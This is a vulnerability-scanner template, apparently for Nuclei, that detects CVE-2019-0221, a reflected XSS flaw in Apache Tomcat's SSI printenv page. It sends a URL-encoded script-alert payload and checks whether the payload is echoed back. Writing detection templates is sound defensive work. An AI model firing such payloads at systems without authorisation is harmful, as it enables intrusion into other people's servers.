id: CVE-2019-0221

info:
  name: Apache Tomcat XSS
  author: pikpikcu
  severity: low
  reference:
    - https://seclists.org/fulldisclosure/2019/May/50
    - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
    - https://www.exploit-db.com/exploits/50119
  description: |
      The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
      7.0.0 to 7.0.93 echoes user provided data without escaping and is,
      therefore, vulnerable to XSS. SSI is disabled by default.
      The printenv command is intended for debugging and is unlikely to be present in a production website.
  tags: cve,cve2019,apache,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
      - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('xss')</script>"

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200